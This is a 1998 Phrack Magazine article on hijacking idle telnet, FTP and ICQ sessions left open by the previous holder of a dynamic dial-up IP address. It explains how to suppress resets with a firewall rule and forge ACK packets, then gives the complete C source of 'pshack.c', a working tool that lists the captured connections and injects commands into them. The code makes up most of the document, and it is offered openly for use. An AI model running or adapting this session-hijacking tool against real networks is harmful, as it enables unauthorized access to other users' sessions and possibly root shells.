| ---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 07 of 12 | |
| -------------------------[ Scavenging Connections On Dynamic-IP Networks | |
| --------[ Seth McGann <smm@wpi.edu> (www.el8.org) 11.29.98 | |
| ----[ Purpose | |
| This paper will highlight a potentially serious loophole in networks that rely | |
| on dynamic IP assignment. More specifically, dial-up dynamic IP assignment | |
| provided by almost every Internet Service Provider. This problem will allow | |
| the unauthorized use of the previous host's connections, for instance, in | |
| progress telnet and ftp control sessions. This issue is reminiscent of the | |
| problem where terminal servers would sometimes provide an already logged in | |
| session to a user lucky enough to call precisely after a forced disconnect due | |
| to line noise or other outside factor. | |
| ----[ The Problem | |
| To perform this feat we rely on some well know concepts, usually employed for | |
| non-blind spoofing or session hijacking. First, we have to understand what | |
| a connection looks like after an abrupt loss of service. The key point is | |
| that the connection does not simply disappear, because there is no way for the | |
| disconnected host to notify the remote end that it has lost its link. If the | |
| remote end tries to send more data and there is no host available, the upstream | |
| router will generate an ICMP unreachable and the connection will be terminated. | |
| If another dial-up user connects before the remote end has sent any more data | |
| the story is different. For a TCP based connection, the kernel will see a | |
| packet going to an unconnected port, usually with PUSH and ACK set or simply | |
| ACK, and will generate a RST, ending the connection. For an incident UDP | |
| packet, an ICMP unreachable is generated. Either way the connection will | |
| evaporate. | |
| ----[ The Solution | |
| Solving the problem is twofold. We must first prevent the kernel from killing | |
| the connections and second we must make sure the remote end knows we are still | |
| alive, to prevent timeouts. For UDP the answer is very simple. As long as we | |
| block outbound ICMP unreachable packets the remote end won't disconnect. | |
| Application timeouts must be dealt with, of course. For TCP we have a bigger | |
| problem, since the connections will die if not responded to. To prevent our | |
| poisonous RST packets from reaching the remote side we simply block all | |
| outbound TCP traffic. To keep the dialogue going, we simply ACK all incident | |
| PUSH|ACK packets and increment the ACK and SEQ numbers accordingly. We | |
| recover data from packets with the PUSH flag set. Additionally we can | |
| send data back down the connection by setting the PUSH and ACK flags on | |
| our outbound packets. | |
| ----[ Implementation | |
| To stop our kernel from killing the latent connections, we first block all | |
| outbound traffic. Under linux a command such as the following would be | |
| effective: | |
| /sbin/ipfwadm -O -a deny -S 0.0.0.0/0 -P all -W ppp0 | |
| Now, no RST packets or ICMP will get out. We are essentially turning off | |
| kernel networking support and handling all the details ourselves. This will | |
| not allow us to send using raw sockets, unfortunately. SOCK_PACKET could | |
| be used, but in the interests of portability the firewall is simply opened | |
| to send a packet and then closed. To be useful on a larger number of | |
| platforms, libpcap 0.4 was used for pulling packets off the wire and | |
| Libnet 0.8b was used for putting them back again. The program itself is | |
| called pshack.c because that's basically all it does. Additionally, it will | |
| allow you respond to in progress connections just in case you find a root | |
| shell. It will also accept inbound connections, and allow you to reply to | |
| them. Note, this will only work on Linux right now, due to the differences in | |
| handling of the firewall. This is very minor and will be fixed soon. It | |
| should compile without incident on RedHat 5.1 or 4.2 and on Slackware as well, | |
| given one change to the ip firewall header file, namely taking out the | |
| #include <linux/tcp.h> line. | |
| ----[ Conclusions | |
| Using this program it is easy to scavenge telnet and ftp control sessions, | |
| or basically any low traffic, idle connection. Grabbing ICQ sessions is a | |
| good example of a UDP based scavenge. Obviously, streaming connections, | |
| such as ftp data will be ICMP to death before they can be scavenged. It's | |
| interesting to note that hosts that drop ICMP unreachable packets, for fear | |
| of forged unreachable packets, are particularly vulnerable as they will not | |
| lose the connection as quickly. | |
| Required: | |
| libpcap 0.4 -> ftp://ftp.ee.lbl.gov/libpcap.tar.Z | |
| Libnet 0.8b -> http://www.infonexus.com/~daemon9/Projects/Libnet/ | |
| <++> scavenge/pshack.c | |
| /* - PshAck.c - Attempts to scavenge connections when you dial up an ISP. | |
| * Author: Seth McGann <smm@wpi.edu> / www.el8.org (Check papers section) | |
| * Date: 11/29/98 | |
| * Greets: dmess0r,napster,awr,all things w00w00,#203 | |
| * Version: 0.3 | |
| * | |
| * Usage: | |
| * 1. Dial up your ISP and start pshack up. | |
| * 2. If you are lucky you will see connections you did not | |
| * make :) | |
| * 3. Repeat the procedure. | |
| * Options: | |
| * -i: The interface | |
| * -l: Link offset | |
| * -s: Your source IP | |
| * | |
| * Compiling: 'gcc pshack.c -o pshack -lnet -lpcap' should work given you have | |
| * libpcap and Libnet installed properly. | |
| * | |
| * libpcap 0.4 : ftp://ftp.ee.lbl.gov/libpcap.tar.Z | |
| * Libnet 0.8b: http://www.infonexus.com/~daemon9/Projects/Libnet/ | |
| * | |
| * Have fun! | |
| */ | |
| #define __BSD_SOURCE | |
| #include <netinet/udp.h> | |
| #define __FAVOR_BSD | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <syslog.h> | |
| #include <sys/time.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <net/if.h> | |
| #include <libnet.h> | |
| #include <pcap.h> | |
| #include <netinet/ip_fw.h> | |
| #include <setjmp.h> | |
| /* #define DEBUGIT */ | |
| #ifdef DEBUGIT | |
| #define DEFAULT_INTERFACE "eth1" | |
| #define DEFAULT_OFFSET 14 | |
| #else | |
| #define DEFAULT_INTERFACE "ppp0" /* Default is PPP with no linklayer */ | |
| #define DEFAULT_OFFSET 0 | |
| #endif | |
| struct conn { | |
| u_int type; | |
| u_long src,dst,seq,ack; | |
| u_short sport,dport; | |
| }; | |
| void clean_exit(int); | |
| void time_out(int); | |
| void usage(char *); | |
| void dump_packet( u_char *, int ); | |
| int update_db( u_char *, int, struct conn*); | |
| void dump_db (struct conn*); | |
| char errbuf[2000]; | |
| sigjmp_buf env; | |
| int | |
| main (int argc, char **argv) { | |
| struct ip *ip_hdr; | |
| struct tcphdr *tcp_hdr; | |
| struct udphdr *udp_hdr; | |
| struct ip_fw fw; | |
| struct ifreq ifinfo; | |
| struct pcap_pkthdr ph; | |
| pcap_t *pd; | |
| u_long local=0,seq,ack; | |
| u_short flags=0; | |
| u_char *d_ptr,*packet; | |
| u_char *pbuf=malloc(TCP_H+IP_H+500); | |
| char iface[17],sendbuf[500]; | |
| int osock,sfd,linkoff,i,datalen,newsize,dbsize=0; | |
| struct conn conn[100]; /* WAY more than enough */ | |
| char arg; | |
| fd_set rfds; | |
| struct timeval tv; | |
| int retval; | |
| char user[500]; | |
| strcpy(iface,DEFAULT_INTERFACE); | |
| linkoff=DEFAULT_OFFSET; | |
| while((arg = getopt(argc,argv,"i:s:l:")) != EOF){ | |
| switch(arg) { | |
| case 's': | |
| local=inet_addr(optarg); | |
| break; | |
| case 'i': | |
| strncpy(iface,optarg,16); | |
| break; | |
| case 'l': | |
| linkoff=atoi(optarg); | |
| break; | |
| default: | |
| usage(argv[0]); | |
| break; | |
| } | |
| } | |
| printf("* Blocking till %s comes up *\n",iface); | |
| do {pd=pcap_open_live(iface,1500,0,500,errbuf);}while(!pd); | |
| printf("* Configuring Raw Output *\n"); | |
| osock=open_raw_sock(IPPROTO_RAW); | |
| if (osock<0)perror("socket()"),exit(1); | |
| strcpy(ifinfo.ifr_ifrn.ifrn_name,iface); | |
| if(ioctl(osock,SIOCGIFFLAGS,&ifinfo)<0)perror("ioctl()"),exit(1); | |
| if(ioctl(osock,SIOCSIFFLAGS,&ifinfo)<0)perror("ioctl()"),exit(1); | |
| if(ioctl(osock,SIOCGIFADDR,&ifinfo)<0)perror("ioctl()"),exit(1); | |
| bcopy(&ifinfo.ifr_addr.sa_data[2],&local,4); | |
| printf("* Address: %s\n",host_lookup(local,0)); | |
| printf("* Blocking Outbound on %s *\n",iface); | |
| sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW); | |
| if(sfd<0) perror("socket()"),exit(1); | |
| bzero(&fw,sizeof(fw)); | |
| strcpy(fw.fw_vianame,iface); | |
| #ifdef DEBUGIT | |
| fw.fw_flg=IP_FW_F_ICMP; | |
| if(setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw))<0) | |
| perror("setsockopt()"),exit(1); | |
| fw.fw_flg=IP_FW_F_TCP; | |
| fw.fw_nsp=1; | |
| fw.fw_pts[0]=666; | |
| #endif | |
| if(setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw))<0) | |
| perror("setsockopt()"),exit(1); | |
| signal(SIGTERM,clean_exit); | |
| signal(SIGINT,clean_exit); | |
| signal(SIGALRM,time_out); | |
| printf("* Entering Capture Loop *\n\n"); | |
| printf("* Commands [1] Dump databese\n" | |
| " [2] Send on connection <n> Ex: 2 1 ls -al\n" | |
| " [3] Exit\n\n"); | |
| sigsetjmp(env,1); | |
| FD_ZERO(&rfds); | |
| FD_SET(0, &rfds); | |
| tv.tv_sec = 0; | |
| tv.tv_usec = 0; | |
| retval = select(1, &rfds, NULL, NULL, &tv); | |
| if (retval) { | |
| retval=read(1,user,sizeof(user)); | |
| user[retval]=0; | |
| switch(user[0]) { | |
| case '1': | |
| dump_db(conn); | |
| break; | |
| case '2': | |
| i=atoi(&user[2]); | |
| if (i > dbsize) { | |
| printf("* Invalid connection index) *\n"); | |
| break; | |
| } | |
| build_ip(TCP_H, | |
| 101, | |
| 0, | |
| IP_DF, | |
| 128, | |
| IPPROTO_TCP, | |
| local, | |
| htonl(conn[i].src), | |
| NULL, 0, pbuf); | |
| build_tcp(conn[i].dport, | |
| conn[i].sport, | |
| conn[i].seq, | |
| conn[i].ack, | |
| TH_PUSH|TH_ACK, 31000, 0,user+4,strlen(user+4), | |
| pbuf + IP_H); | |
| do_checksum(pbuf, IPPROTO_TCP, TCP_H+strlen(user+4)); | |
| setsockopt(sfd,IPPROTO_IP,IP_FW_DELETE_OUT,&fw,sizeof(fw)); | |
| write_ip(osock, pbuf, TCP_H + IP_H + strlen(user+4)); | |
| setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw)); | |
| printf("Sent: %s\n",user+4); | |
| break; | |
| case '3': | |
| clean_exit(1); | |
| break; | |
| default: | |
| break; | |
| } | |
| } | |
| alarm(1); | |
| for(;packet=pcap_next(pd,&ph);) { | |
| ip_hdr = (struct ip *)(packet + linkoff); | |
| switch(ip_hdr->ip_p) { | |
| case IPPROTO_TCP: | |
| tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl)); | |
| dump_packet(packet,linkoff); | |
| #ifdef DEBUGIT | |
| if ((ntohl(ip_hdr->ip_src.s_addr) != local) && | |
| ntohs(tcp_hdr->th_dport)==666) { | |
| #else | |
| if (ntohl(ip_hdr->ip_src.s_addr) != local) { | |
| #endif | |
| newsize=update_db(packet, linkoff, conn); | |
| if(newsize>dbsize) { | |
| printf("New Connect:\n"); | |
| dbsize=newsize;} | |
| if (tcp_hdr->th_flags&TH_PUSH || (tcp_hdr->th_flags&TH_SYN && | |
| tcp_hdr->th_flags&TH_ACK)) { | |
| datalen=ntohs(ip_hdr->ip_len)-IP_H-TCP_H; | |
| if(!datalen) datalen++; | |
| seq=ntohl(tcp_hdr->th_ack); | |
| ack=ntohl(tcp_hdr->th_seq)+datalen; | |
| flags=TH_ACK; | |
| } else if(tcp_hdr->th_flags&TH_SYN) { | |
| seq=get_prand(PRu32); | |
| ack=ntohl(tcp_hdr->th_seq)+1; | |
| flags=TH_SYN|TH_ACK; | |
| } | |
| if(flags) { | |
| build_ip(TCP_H, | |
| 101, | |
| 0, | |
| IP_DF, | |
| 128, | |
| IPPROTO_TCP, | |
| local, | |
| ip_hdr->ip_src.s_addr, | |
| NULL, 0, pbuf); | |
| build_tcp(ntohs(tcp_hdr->th_dport), | |
| ntohs(tcp_hdr->th_sport), | |
| seq, | |
| ack, | |
| flags, 31000, 0, NULL, 0, pbuf + IP_H); | |
| do_checksum(pbuf, IPPROTO_TCP, TCP_H); | |
| setsockopt(sfd,IPPROTO_IP,IP_FW_DELETE_OUT,&fw,sizeof(fw)); | |
| write_ip(osock, pbuf, TCP_H + IP_H); | |
| setsockopt(sfd,IPPROTO_IP,IP_FW_INSERT_OUT,&fw,sizeof(fw)); | |
| flags=0; } | |
| } | |
| break; | |
| case IPPROTO_UDP: | |
| dump_packet(packet,linkoff); | |
| break; | |
| default: | |
| break; | |
| } | |
| } | |
| } | |
| void | |
| dump_packet( u_char *packet, int linkoff ) { | |
| struct ip *ip_hdr; | |
| struct tcphdr *tcp_hdr; | |
| struct udphdr *udp_hdr; | |
| u_char *d_ptr; | |
| u_int i; | |
| ip_hdr = (struct ip *)(packet + linkoff); | |
| switch (ip_hdr->ip_p) { | |
| case IPPROTO_TCP: | |
| tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl)); | |
| printf("********************\n"); | |
| printf("TCP: %s.%d->%s.%d SEQ: %u ACK: %u\n " | |
| "Flags: %c%c%c%c%c%c Data Len: %d\n", | |
| host_lookup(ip_hdr->ip_src.s_addr,0), | |
| ntohs(tcp_hdr->th_sport), | |
| host_lookup(ip_hdr->ip_dst.s_addr,0), | |
| ntohs(tcp_hdr->th_dport), | |
| ntohl(tcp_hdr->th_seq), | |
| ntohl(tcp_hdr->th_ack), | |
| (tcp_hdr->th_flags & TH_URG) ? 'U' : '-', | |
| (tcp_hdr->th_flags & TH_ACK) ? 'A' : '-', | |
| (tcp_hdr->th_flags & TH_PUSH) ? 'P' : '-', | |
| (tcp_hdr->th_flags & TH_RST) ? 'R' : '-', | |
| (tcp_hdr->th_flags & TH_SYN) ? 'S' : '-', | |
| (tcp_hdr->th_flags & TH_FIN) ? 'F' : '-', | |
| ntohs(ip_hdr->ip_len)-IP_H-TCP_H); | |
| d_ptr=packet+linkoff+TCP_H+IP_H; | |
| for(i=0;i<(ntohs(ip_hdr->ip_len)-IP_H-TCP_H);i++) | |
| if (d_ptr[i]=='\n') | |
| printf("\n"); | |
| else if (d_ptr[i]>0x1F && d_ptr[i]<0x7F) | |
| printf("%c",d_ptr[i]); | |
| else | |
| printf ("."); | |
| printf("\n"); | |
| break; | |
| case IPPROTO_UDP: | |
| udp_hdr=(struct udphdr*)(((char*)ip_hdr) + (4 * ip_hdr->ip_hl)); | |
| printf("********************\n"); | |
| printf("UDP: %s.%d->%s.%d Data Len: %d\n", | |
| host_lookup(ip_hdr->ip_src.s_addr,0), | |
| ntohs(udp_hdr->uh_sport), | |
| host_lookup(ip_hdr->ip_dst.s_addr,0), | |
| ntohs(udp_hdr->uh_dport), | |
| ntohs(ip_hdr->ip_len)-IP_H-UDP_H); | |
| d_ptr=packet+linkoff+UDP_H+IP_H; | |
| for(i=0;i<(ntohs(udp_hdr->uh_ulen)-UDP_H);i++) | |
| if (d_ptr[i]=='\n') | |
| printf("\n"); | |
| else if (d_ptr[i]>0x19 && d_ptr[i]<0x7F) | |
| printf("%c",d_ptr[i]); | |
| else | |
| printf("."); | |
| printf("\n"); | |
| break; | |
| default: | |
| /* We ignore everything else */ | |
| break; | |
| } | |
| } | |
| void | |
| clean_exit(int val) { | |
| int sfd,p=0; | |
| sfd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW); | |
| if (sfd<0) perror("socket()"),exit(1); | |
| if(setsockopt(sfd,IPPROTO_IP,IP_FW_FLUSH_OUT,&p,sizeof(p))<0) | |
| perror("setsockopt()"),exit(1); | |
| exit(0); | |
| } | |
| void | |
| usage(char *arg) { | |
| printf("%s: [options]\n" | |
| " -i: The interface\n" | |
| " -l: Link offset\n" | |
| " -s: Your source IP\n\n",arg); | |
| exit(0); | |
| } | |
| void | |
| dump_db (struct conn *conn) { | |
| int i; | |
| for(i=0;conn[i].type;i++) | |
| if(conn[i].type==IPPROTO_TCP) | |
| printf("%d: TCP: %s.%d->%s.%d SEQ: %u ACK: %u\n", | |
| i, host_lookup(htonl(conn[i].src),0),conn[i].sport, | |
| host_lookup(htonl(conn[i].dst),0), conn[i].dport, | |
| conn[i].seq,conn[i].ack); | |
| else if(conn[i].type==IPPROTO_UDP) | |
| printf("%d: UDP: %s.%d->%s.%d\n", | |
| i, host_lookup(htonl(conn[i].src),0),conn[i].sport, | |
| host_lookup(htonl(conn[i].dst),0), conn[i].dport); | |
| else break; | |
| } | |
| int | |
| update_db( u_char *packet, int linkoff, struct conn *conn) { | |
| struct ip *ip_hdr; | |
| struct tcphdr *tcp_hdr; | |
| struct udphdr *udp_hdr; | |
| int i=0; | |
| ip_hdr = (struct ip *)(packet + linkoff); | |
| switch(ip_hdr->ip_p) { | |
| case IPPROTO_TCP: | |
| tcp_hdr=(struct tcphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl)); | |
| for(i=0;conn[i].type;i++) | |
| if(conn[i].type==IPPROTO_TCP) | |
| if(ip_hdr->ip_src.s_addr==htonl(conn[i].src)) | |
| if(ip_hdr->ip_dst.s_addr==htonl(conn[i].dst)) | |
| if(ntohs(tcp_hdr->th_sport)==conn[i].sport) | |
| if(ntohs(tcp_hdr->th_dport)==conn[i].dport) | |
| break; | |
| if(conn[i].type) { | |
| conn[i].seq=ntohl(tcp_hdr->th_ack); | |
| conn[i].ack=ntohl(tcp_hdr->th_seq); } | |
| else { | |
| conn[i].type=IPPROTO_TCP; | |
| conn[i].src=ntohl(ip_hdr->ip_src.s_addr); | |
| conn[i].dst=ntohl(ip_hdr->ip_dst.s_addr); | |
| conn[i].sport=ntohs(tcp_hdr->th_sport); | |
| conn[i].dport=ntohs(tcp_hdr->th_dport); | |
| conn[i].seq=ntohl(tcp_hdr->th_ack); | |
| conn[i].ack=ntohl(tcp_hdr->th_seq); } | |
| break; | |
| case IPPROTO_UDP: | |
| udp_hdr=(struct udphdr*)(((char*)ip_hdr)+(4*ip_hdr->ip_hl)); | |
| for(i=0;conn[i].type;i++) | |
| if(conn[i].type==IPPROTO_TCP) | |
| if(ntohl(ip_hdr->ip_src.s_addr)==conn[i].src) | |
| if(ntohl(ip_hdr->ip_dst.s_addr)==conn[i].dst) | |
| if(ntohs(udp_hdr->uh_sport)==conn[i].sport) | |
| if(ntohs(udp_hdr->uh_dport)==conn[i].dport) break; | |
| if(!conn[i].type) { | |
| conn[i].type=IPPROTO_UDP; | |
| conn[i].src=ntohl(ip_hdr->ip_src.s_addr); | |
| conn[i].dst=ntohl(ip_hdr->ip_dst.s_addr); | |
| conn[i].sport=ntohs(udp_hdr->uh_sport); | |
| conn[i].dport=ntohs(udp_hdr->uh_dport); } | |
| break; | |
| default: | |
| /* We Don't care */ | |
| break; | |
| } | |
| return i; | |
| } | |
| void | |
| time_out(int blank) { | |
| alarm(0); | |
| siglongjmp(env,1); | |
| } | |
| /* EOF */ | |
| <--> | |
| ----[ EOF | |